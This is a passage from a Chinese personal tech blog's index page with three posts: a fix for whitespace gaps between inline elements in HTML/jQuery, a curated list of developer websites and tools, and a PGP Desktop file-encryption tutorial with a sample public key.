所以，因为代码中我使元素呈现 inline 的属性，然后两个代码之间具有换行，所以二者之间出现了空白。正常情况下，二者之间是不应该出现空白的。然而用 jQuery 生成元素的时候，因为是用的 + 连接符，所以换行符被忽略了。也就是代码是连接起来的，所以二者之间便不会出现空白。解决方法： 1.将原代码中的 input 写到一行。如下： <figure class="highlight pgsql"> <table> <tr> <td class="gutter"> <pre>1 2 3 </pre> </td> <td class="code"> <pre><div class="form-group"> <input class="form-control inline span3" name="education[school][]" type="text" value="123"><input class="form-control inline span3" name="education[date][]" type="text" value="456"> </div> </pre> </td> </tr> </table> </figure> 2.或者在 JS 代码中加入换行符。如下： <figure class="highlight scala"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 </pre> </td> <td class="code"> <pre>$('button').on('click', function() { $('<div class="form-group">'+ '<input class="form-control inline span3" name="education[school][]" type="text" value="">\n'+ '<input class="form-control inline span3" name="education[date][]" type="text" value="">'+ '</div>').appendTo($(".content")); }); </pre> </td> </tr> </table> </figure> 以上两种方式，解决方法都比较简单实用。其他的改变 padding 或者 margin 的方法就不推荐了。好了，那么明白了之后，我们肯定要可以举一反三的，来探究一下如果是块级元素会不会这样呢？ <h2 id="举一反三"><a href="#举一反三" class="headerlink" title="举一反三"></a>举一反三</h2> 好的，让我们试一下块级元素如果设置为 inline 的话会不会也这样。把 input 标签改成 div，然后给它加上 display: inline 属性，加一下背景颜色区分，观察一下效果。代码如下： <figure class="highlight xml"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 </pre> </td> <td class="code"> <pre><!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css"> </head> <body> <h1>点击按钮添加元素</h1> <div class="content"> <div class="form-group"> <div class="item">hello1</div> <div class="item">hello2</div> </div> </div> <button class="btn btn-primary">添加</button> <script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script> <script src="//cdn.bootcss.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> <style> .item { display: inline; background: #555; } </style> </body> </html> </pre> </td> </tr> </table> </figure> 观察一下效果 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220135.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220135.png" alt="20151226220135"></a> 嗯，果然，它的间距还是出现了。那么改成 display: inline-block 呢？ <figure class="highlight css"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 </pre> </td> <td class="code"> <pre>.item { display: inline-block; width: 200px; background: #555; } </pre> </td> </tr> </table> </figure> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220326.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220326.png" alt="20151226220326"></a> 可见间距还是有的。我们把 div 的换行去掉，看一下。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220443.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226220443.png" alt="20151226220443"></a> Perfect！它已经消失不见了！以上，在 chrome，edge，ie11 测试通过。 <h2 id="综述"><a href="#综述" class="headerlink" title="综述"></a>综述</h2> 通过以上研究我们可以得出如下结论：内联元素，代码中带有换行，会出现空白间距。块级元素，设置了内联样式，且代码中带有换行，也会出现空白间距。解决方法是删除代码中的换行即可。以上是在写程序过程中发现的现象，希望能对大家有帮助！ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-01-02 22:08:42" itemprop="dateCreated datePublished" datetime="2016-01-02T22:08:42+08:00">2016-01-02</time> 阅读次数： 本文字数： 2.4k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/455.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Other </a> <a href="/455.html" class="post-title-link" itemprop="url">干货！IT小伙伴们实用的网站及工具大集合！持续更新！</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 1.Git 还在担心自己辛辛苦苦写的代码被误删了吗？还在担心自己改错了代码不能挽回吗？还在苦恼于多人开发合作找不到一个好的工具吗？那么用 Git 就对了，Git 是一个开源的分布式版本控制系统，用以有效、高速的处理从很小到非常大的项目版本管理。有了它，代码托管不是问题，版本控制不再苦恼，多人开发变得简单易行。链接：<a href="http://git-scm.com/" target="_blank" rel="noopener">http://git-scm.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124142208-e1416810150194.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124142208-1024x341.jpg" alt="QQ截图20141124142208"></a> 2.GitHub 学会了 Git 之后，我们把代码托管到哪里呢？在此推荐给大家两个网站，GitHub，一个是国外免费的代码托管平台。许许多多的开源项目几乎都托管在上面，你也可以在上面搜一些你需要的源代码，丰富资源应有尽有，如果还不知道这个，是不是已经 Out 了呢？链接：<a href="https://github.com/" target="_blank" rel="noopener">https://github.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124142704-e1416810453291.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124142704-1024x415.jpg" alt="QQ截图20141124142704"></a> 3.GitCafe 和 GitHub 一样，也是一个免费的代码托管平台。GitHub 是国外的，GitCafe 是国内的。两者功能几乎相同，不喜欢英文版的朋友可以来 GitCafe 尝尝鲜。链接：<a href="http://gitcafe.com/" target="_blank" rel="noopener">http://gitcafe.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124143049-e1416810670667.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124143049-1024x484.jpg" alt="QQ截图20141124143049"></a> 4.七牛云存储还在为自己项目的图片等资源没处存放而着急吗？还在担心图片加载耗费你主机大量流量吗？还在为你自己的网站加载速度过慢而揪心吗？云时代，就要用云存储。比如我有一个虚拟主机是每月限流量的，而大量的图片加载占据了我网站访问流量的大部分，这时我们就可以考虑将图片移植到七牛云存储上，图片通过七牛来加载，节省宝贵的主机空间和流量。比如我的个人网站已经移植到了七牛，所有网页图片的加载都是从七牛上获取，速度快而且省流量。而且免费的七牛还提供了图片处理，比如压缩，水印等各种图片加工方式，想要什么有什么。链接：<a href="http://www.qiniu.com/" target="_blank" rel="noopener">http://www.qiniu.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124143837-e1416811137547.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124143837-1024x432.jpg" alt="QQ截图20141124143837"></a> 5.云适配有时候我们做出的网站没有用到响应式布局，也可能我们的网站 DIV 的像素宽度已经规定成具体的多少像素了。所以，用手机访问的时候可能就会出现这样那样的问题，或者显示得很小，或者整个布局全都乱掉了。这时，我们需要把自己的网站适配一下，那么在此推荐一个网站，云适配。插入一行代码，通过在线修改和生成手机适配效果，得到手机访问的网页最佳适配效果，方便而又快捷。这时电脑和手机均能看到最佳适配效果了。链接：<a href="http://www.yunshipei.com/" target="_blank" rel="noopener">http://www.yunshipei.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124144434-e1416811549465.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124144434-1024x404.jpg" alt="QQ截图20141124144434"></a> 6.聚合数据大家在开发过程中，可能会用到各种各样的数据，想找一些接口来提供一些数据。比如天气预报查询，火车时刻表查询，彩票查询，身份证查询等等。有了这个接口，直接调用即可。各种各样的 API 接口满足你。链接：<a href="http://www.juhe.cn/" target="_blank" rel="noopener">http://www.juhe.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124150336-e1416812634424.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124150336-1024x439.jpg" alt="QQ截图20141124150336"></a> 7.够快云库够快云库，是基于云存储的团队协作性文件管理平台。团队成员可以同步共享资料，即时沟通交流，便捷移动办公，从而实现团队的 100％高效运作。比如团队开发过程中有什么要共享的资料，就可以放到里面。支持在线编辑和修改，小组讨论合作等方式。链接：<a href="http://www.gokuai.com/" target="_blank" rel="noopener">http://www.gokuai.com/</a><a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124150727-e1416812868208.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124150727-1024x370.jpg" alt="QQ截图20141124150727"></a> 8.SAE SAE 的强大不用多说了，强大的虚拟主机提供商。提供各种各样的编程语言在线运行，同时提供云存储 Storage，各种数据库，应用十分广泛。不仅提供代码托管，还提供在线服务器运行，JAVA，PHP，Python 等等的支持应有尽有，在这里你可以假设你自己的网站，你的应用接口，你的创意应用。好不好，用用就知道。另外还有 JAE（京东），BAE（百度），功能类似，也推荐一下。链接：<a href="http://sae.sina.com.cn/" target="_blank" rel="noopener">http://sae.sina.com.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124151607-e1416813413924.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124151607-1024x360.jpg" alt="QQ截图20141124151607"></a> 9.多备份多备份提供了主机的文件备份及数据库的备份。可能对于文件的备份大家都已经有其他方法了，不过数据库的自动备份现在还没有多少有效的解决方法，人工备份又显得比较麻烦。如果数据库有数据丢失，那就不好找回了。在此推荐一个网站：多备份。提供主机的文件自动备份和数据库自动备份，方便快捷。链接：<a href="http://www.dbfen.com/" target="_blank" rel="noopener">http://www.dbfen.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152121-e1416813698270.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152121-1024x410.jpg" alt="QQ截图20141124152121"></a> 10.慕课网学习 IT 知识哪家强？在此为大家推荐一个全免费的学习网站，资源丰富，还提供了比较创新的学习和练习相结合的方式。感觉非常不错，讲解得也很有条理，推荐一下。链接：<a href="http://www.imooc.com/" target="_blank" rel="noopener">http://www.imooc.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152408-e1416813887400.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152408-1024x410.jpg" alt="QQ截图20141124152408"></a> 11.W3SCHOOL 这也是一个非常棒的学习网站，讲解简单易懂，我的 PHP 入门，HTML，JS，CSS 入门都是从这里学到的，感觉讲解非常不错。链接：<a href="http://www.w3school.com.cn/" target="_blank" rel="noopener">http://www.w3school.com.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152659-e1416814040907.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124152659-1024x393.jpg" alt="QQ截图20141124152659"></a> 12.阿里云感觉比较不错的主机提供商，提供免费备案，对于 ECS 的管理做得非常好，数据恢复和备份及监控也应有尽有，另外提供了 SLB，RDS，CDN 等等的支持，个人感觉很不错的主机提供商。就是价格略贵！链接：<a href="http://www.aliyun.com/" target="_blank" rel="noopener">http://www.aliyun.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124153235.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124153235-1024x322.jpg" alt="QQ截图20141124153235"></a> 13.DNSPod 免费的域名解析提供商，管理方便，简洁高效。非常人性化的提示，还提供域名 D 监控等功能，方便实用。链接：<a href="https://www.dnspod.cn/" target="_blank" rel="noopener">https://www.dnspod.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124153637-e1416814632344.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124153637.jpg" alt="QQ截图20141124153637"></a> 14.WordPress 一款开源的 PHP 框架，搭建个人博客网站最实用的选择之一。我的个人网站就是基于此搭建，甚至你都不需要懂 PHP 你就可以搭建自己的个人网站。提供强大的后台文章管理和插件及主题管理，几乎可以满足个人网站所有需求。 P.S.找个好的网站模板，你就相当于成功了一大半。链接：<a href="http://cn.wordpress.org/" target="_blank" rel="noopener">http://cn.wordpress.org/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154227-e1416814969553.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154227.jpg" alt="QQ截图20141124154227"></a> 15.BootStrap 一个强大的前端框架，有了它你再也不需要敲那么多行的样式表，再也不用一点点地调试难看的 DIV 了。直接调用各种 CSS 样式，分分钟写出好看的网页界面。按钮、表格、进度条、提示框、输入框、菜单，应有尽有。链接：<a href="http://www.bootcss.com/" target="_blank" rel="noopener">http://www.bootcss.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154554.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154554-1024x428.jpg" alt="QQ截图20141124154554"></a> 16.芒果广告如果你开发了自己的移动应用，想添加广告来赚钱，推荐芒果广告。它是一个综合的移动广告平台，聚合了百度广告、多盟广告、易传媒等等广大广告商，可以自己定制广告显示的内容及样式，可以选择各种广告的投放比例。广告点击量、展现量详细报告、收入分析详细数据应有尽有。推荐一下。链接：<a href="http://www.adsmogo.com/" target="_blank" rel="noopener">http://www.adsmogo.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154953.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124154953-1024x488.jpg" alt="QQ截图20141124154953"></a> 17.极光推送极光推送，使得开发者可以即时地向其应用程序的用户推送通知或者消息，与用户保持互动，从而有效地提高留存率，提升用户体验 平台提供整合了 Android 推送、iOS 推送的统一推送服务。让用户可以更好地接收你推送的内容。链接：<a href="https://www.jpush.cn/" target="_blank" rel="noopener">https://www.jpush.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124155237.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124155237-1024x434.jpg" alt="QQ截图20141124155237"></a> 18.Bmob 提供强大的后台接口支持，移动开发过程中可能需要各种各样的后台接口，直接利用这个，你可以创建自己的后台接口。它还提供了强大的游戏后端支持数据，文档和教程也是非常的完备，为移动开发带来相当大的便利。链接：<a href="http://www.bmob.cn/" target="_blank" rel="noopener">http://www.bmob.cn/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124155600.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124155600-1024x560.jpg" alt="QQ截图20141124155600"></a> 19.有道云笔记大多数人都听说过吧？在学习或者开发过程中可能会有各种各样的知识点，好记性不如烂笔头。最好的方式就是记录下来。在此推荐一个笔记，有道云笔记。在使用了各种笔记工具之后，发现还是有道好用。它提供了个人云笔记，云协作等功能，做到 PC、手机、平板等多处同步。占用小，界面美观，使用方便。链接：<a href="http://note.youdao.com/" target="_blank" rel="noopener">http://note.youdao.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124160008.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124160008-1024x496.jpg" alt="QQ截图20141124160008"></a> 20.Coding 集合了 GitHub 和 SAE 的功能，利用 Git 上传代码，并对代码进行托管，而且提供了一键部署和运行的功能。提供了代码监控功能，通过自动化静态代码分析等管理工具，发现代码问题，获取代码度量信息，及时了解代码质量状况。一个新兴网站，推荐一下！链接：<a href="https://coding.net" target="_blank" rel="noopener">https://coding.net</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161059.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161059-1024x349.jpg" alt="QQ截图20141124161059"></a> 21.SendCloud 开发过程中你可能会遇到邮件发送的功能，用了 SendCloud，一切都方便多了，它提供免费的邮件代发功能。邮件发送的难题，就交给它来解决吧。链接：<a href="http://sendcloud.sohu.com/" target="_blank" rel="noopener">http://sendcloud.sohu.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161409.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161409-1024x403.jpg" alt="QQ截图20141124161409"></a> 22.蒲公英有时候你发布 Android 市场，发布 Appstore，会花费相当多的时间才能得到审核通过。那么在团队之间，想团队之间提供内测功能，那么就可以用到它啦，这里提供了一个发布应用的平台，发布之后，生成链接和二维码，即可实现下载测试，简单方便。链接：<a href="http://www.pgyer.com/" target="_blank" rel="noopener">http://www.pgyer.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161757.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124161757-1024x396.jpg" alt="QQ截图20141124161757"></a> 23.DCloud HTML5 现在已经定稿，用 HTML5 开发 APP 的浪潮即将袭来，在此提供一个免费的开发网站。它提供了一个 HBuilder 的工具，以及 H5APP 开发文档及 H5APP 的开发框架 MUI 框架，有了它，H5APP 的开发变得相当简单，而我也在蠢蠢欲动。链接：<a href="http://www.dcloud.io/" target="_blank" rel="noopener">http://www.dcloud.io/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162042.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162042-1024x485.jpg" alt="QQ截图20141124162042"></a> 24.青云提供免费的云服务器、云存储、云数据库的功能。同时提供多个开放 API，功能实用，非常强大。链接：<a href="https://www.qingcloud.com/" target="_blank" rel="noopener">https://www.qingcloud.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162338.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162338-1024x425.jpg" alt="QQ截图20141124162338"></a> 25.云测开发了应用之后到哪里去测试？选择云测没错。它提供应用云测试、手机游戏测试，提供崩溃分析。一切测试由它来搞定。链接：<a href="http://www.testin.cn" target="_blank" rel="noopener">http://www.testin.cn</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162721.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2014/11/QQ截图20141124162721-1024x403.jpg" alt="QQ截图20141124162721"></a> 26.Meteor Meteor 是一个构建在 Node.js 之上的平台，用来开发实时网页程序。Meteor 位于程序数据库和用户界面之间，保持二者之间的数据同步更新。链接：<a href="https://www.meteor.com/" target="_blank" rel="noopener">https://www.meteor.com/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/屏幕快照-2016-02-21-14.04.17.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/屏幕快照-2016-02-21-14.04.17-1024x462.png" alt="屏幕快照 2016-02-21 14.04.17"></a> 暂时先分享给大家这么多！如果有好的网站或者应用推荐，欢迎与我交流，可以评论，可以留言！以上是一些比较实用的网站和工具的分享！希望能给大家的生活和开发带来一定的便利！Thanks！ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-12-24 16:32:36" itemprop="dateCreated datePublished" datetime="2015-12-24T16:32:36+08:00">2015-12-24</time> 阅读次数： 本文字数： 3.8k 阅读时长 ≈ 3 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2322.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Other </a> <a href="/2322.html" class="post-title-link" itemprop="url">使用PGP加密你的文件</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2> 有时候，一些文件是不想公开让被人看到的，或者只想某些特定的人看到。比如说，你要上交一个实验报告啦，老师给了一个 FTP 上传目录，但是你只想让老师看到报告，而不想公开给同学们看。这时候，就需要加密一下你的文件啦。那么有什么好的加密方式呢？PGP，你的不二之选。 <h2 id="PGP-加密原理"><a href="#PGP-加密原理" class="headerlink" title="PGP 加密原理"></a>PGP 加密原理</h2> 用直白的话来讲就是对方给你一个公钥，他自己也保存了一个私钥，你利用他的公钥来加密，只有对方自己用自己私钥才能解密。由于其他的人没有拿到私钥，所以解不开的，即使是你自己，也解不开的。所以，这样就保证了，只有你和对方可以查看内容。引用详解原理： <blockquote> PGP(Pretty Good Privacy)，是一个基于 RSA 公钥加密体系的邮件加密软件。可以用它对邮件保密以防止非授权者阅读，它还能对邮件加上数字签名从而使收信人可以确认邮件的发送者，并能确信邮件没有被篡改。它可以提供一种安全的通讯方式，而事先并不需要任何保密的渠道用来传递密匙。它采用了一种 RSA 和传统加密的杂合算法，用于数字签名的邮件文摘算法，加密前压缩等，还有一个良好的人机工程设计。它的功能强大，有很快的速度。 PGP 是一种供大众使用的加密软件。电子邮件通过开放的网络传输，网络上的其他人都可以监听或者截取邮件，来获得邮件的内容，因而邮件的安全问题就比较突出了。保护信息不被第三者获得，这就需要加密技术。还有一个问题就是信息认证，如何让收信人确信邮件没有被第三者篡改，这就需要数字签名技术。RSA 公钥体系的特点使它非常适合用来满足上述两个要求：保密性（Privacy)和认证性（Authentication）。 RSA（Rivest-Shamir-Adleman）算法是一种基于大数不可能质因数分解假设的公匙体系。简单地说就是找两个很大的质数，一个公开即公钥，另一个不告诉任何人，即私钥。这两个密匙是互补的，就是说用公匙加密的密文可以用私匙解密，反过来也一样。假设甲要寄信给乙，他们互相知道对方的公匙。甲就用乙的公匙加密邮件寄出，乙收到后就可以用自己的私匙解密出甲的原文。由于没别人知道乙的私匙，所以即使是甲本人也无法解密那封信，这就解决了信件保密的问题。另一方面由于每个人都知道乙的公匙，他们都可以给乙发信，那么乙就无法确信是不是甲的来信。这时候就需要用数字签名来认证。 </blockquote> <h2 id="加密流程"><a href="#加密流程" class="headerlink" title="加密流程"></a>加密流程</h2> 在 Windows 下，有一个非常强大的工具，叫做 PGP Desktop，可以利用这个来加密。 <a href="http://pan.baidu.com/s/1dEznwe1" target="_blank" rel="noopener">下载链接</a> 这个是 64 位的安装包，安装过程我就不详细描述了，比较简单。如果你的系统是 32 位，那么请再寻找一下其他的安装包。安装之后，搜索一下开始菜单或者安装目录，找到 PGP Desktop，打开它。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003158.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003158.png" alt="20151215003158"></a> 打开之后界面是这个样子的 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003312.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003312-1024x664.png" alt="20151215003312"></a> 恩，别人应该给了你公钥了对吧，比如，这次老师的公钥是 <figure class="highlight excel"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 </pre> </td> <td class="code"> <pre>-----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> mQCNA1NKJuwAAAEEAMvdBmw1TTTkLTL6w9C28MhtVnsWtNeHVJl98CFCzOveyKDH KGPf/RA4moDUE1IkkUelRKJV1O2JlcqBZPOGI/FII/6yq/DbNHKOKhz6fgbbdgxh UArjUSthA/BPnodTcEtGZHlGSvK7n3TcWmGY700YB9crWpbyHfVQ7KLGc3SlAAUR tCF0ZXN0NGNyeXB0byA8dGVzdDRjcnlwdG9AMTYzLmNvbT6JAJUDBRBTSibs9VDs osZzdKUBAQzxBACr3UpakH7SMtU9OgHHZCARE4xKVChTBCh9kquhhU5Kr9Er0AHy UWO1BD+z58VTu9XPR2/NSrCOGNwfZVqZTY8eTUTuQVJKpAR9CNtRi0B6yQa8pQVm 7vfEqzBcsWcPkOzfRU75Ubdc+IxZkdMcPfPnzn1kU2cTKUIlM5+cy/+qvw== =nNyG -----END PGP PUBLIC KEY BLOCK----- </pre> </td> </tr> </table> </figure> 来，添加一下，有一个非常简单的方法就是直接右键粘贴，然后确定就好了。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003737.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003737.png" alt="20151215003737"></a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003953.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215003953.png" alt="20151215003953"></a> 然后，你可以把这个公钥加到你的 Master Keys 里。点击，菜单中的 Tools -> PGP Options -> Master Keys -> Add -> add -> OK，按照图示箭头操作即可。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011210.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011210-1024x596.png" alt="20151215011210"></a> 然后，确定，邮件点一下添加到 Master Keys。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011305.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011305.png" alt="20151215011305"></a> 会提示成功添加。然后接下来就进行加密吧。点左侧的 PGP ZIP，然后 New PGP Zip，然后选择文件，点击确定。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215004710.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215004710.png" alt="20151215004710"></a> 然后直接下一步 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215004802.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215004802.png" alt="20151215004802"></a> 直接下一步 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011736.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011736.png" alt="20151215011736"></a> 然后下一步，选择导出路径即可 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011755.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151215011755.png" alt="20151215011755"></a> 下一步，导出成功，加密完成。导出的文件格式就是原文件名加了 pgp 后缀，只有对方的私钥可以解开。当然如果有不死心的小伙伴想破解，自己试试咯~ <h2 id="综述"><a href="#综述" class="headerlink" title="综述"></a>综述</h2> 以上，为了便于演示，我直接将秘钥添加到了 Master Key 中，其实这个 Master Key 当然最好是你自己专属的秘钥咯，不过无所谓啦，我们只是为了演示一下加密过程，利用这个公钥加密，不要在意这些细节。小伙伴们体验一下吧！ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-12-15 01:23:40" itemprop="dateCreated datePublished" datetime="2015-12-15T01:23:40+08:00">2015-12-15</time> 阅读次数： 本文字数： 2.1k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2286.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Other </a> 